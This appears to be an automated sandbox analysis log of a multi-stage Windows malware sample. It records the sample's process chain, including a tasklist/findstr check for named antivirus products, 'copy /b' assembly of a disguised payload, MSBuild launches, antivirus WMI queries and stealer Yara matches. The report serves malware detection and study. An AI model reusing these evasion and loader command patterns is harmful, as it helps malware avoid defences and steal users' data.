                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009C0B62
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009C1663
                                Source: QkRFz2sau5.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                Source: 9c1024a1f1.exe, 0000000F.00000002.22451144383.00000000011A8000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: Program Manager
                                Source: QkRFz2sau5.exeBinary or memory string: Shell_TrayWnd
                                Source: skotes.exe, skotes.exe, 0000000E.00000002.23299331273.00000000008CB000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: 0Program Manager
                                Source: 935372fb1f.exe, 00000010.00000002.22378101507.00000000005FA000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: &Program Manager
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00980698 cpuid 0_2_00980698
                                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009BD21C GetLocalTime,0_2_009BD21C
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009BD27A GetUserNameW,0_2_009BD27A
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099B952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0099B952
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22790546318.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
Source: 9c1024a1f1.exe, 0000000F.00000003.22404770816.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: 9c1024a1f1.exe, 0000000F.00000002.22457316104.00000000059A2000.00000004.00000800.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001406000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 9c1024a1f1.exe, 9c1024a1f1.exe, 0000000F.00000003.22405142275.00000000059D2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22457601342.00000000059D2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447694707.00000000059D2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                Stealing of Sensitive Information

                                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara match File source: 11.2.Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.420000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 14.2.skotes.exe.6d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 13.2.skotes.exe.6d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 12.2.skotes.exe.6d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000D.00000002.22161020026.00000000006D1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000C.00000002.22160376576.00000000006D1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000002.23298802638.00000000006D1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara match File source: dump.pcap, type: PCAP
                                Source: Yara match File source: Process Memory Space: 9c1024a1f1.exe PID: 3092, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: f891ed3167.exe PID: 5544, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: f8e8a2d2f0.exe PID: 2920, type: MEMORYSTR
                                Source: Yara match File source: 35.2.33c3d7c7bd.exe.a320000.4.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 38.2.f891ed3167.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 43.2.f8e8a2d2f0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 35.2.33c3d7c7bd.exe.a370000.3.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 35.2.33c3d7c7bd.exe.a370000.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 46.0.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 35.2.33c3d7c7bd.exe.a2ba000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 46.2.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 38.2.f891ed3167.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 43.2.f8e8a2d2f0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 35.2.33c3d7c7bd.exe.a320000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 35.2.33c3d7c7bd.exe.a2ba000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 15.2.9c1024a1f1.exe.fc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000023.00000002.22885525568.000000000A2BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000026.00000002.22706302291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000002B.00000002.22744830820.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000002E.00000002.23299926904.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000F.00000002.22450863752.0000000000FC1000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara match File source: 00000023.00000002.22885525568.000000000A370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000023.00000002.22885525568.000000000A320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
                                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                                Source: Yara match File source: 42.2.f8e8a2d2f0.exe.4289550.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 36.2.f891ed3167.exe.3d99550.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 48.2.MSBuild.exe.4078630.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 48.2.MSBuild.exe.69b0000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 48.2.MSBuild.exe.69b0000.2.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 42.0.f8e8a2d2f0.exe.dd0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 36.2.f891ed3167.exe.3d99550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 48.2.MSBuild.exe.4078630.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 36.0.f891ed3167.exe.910000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara match File source: 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000030.00000002.23317961529.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
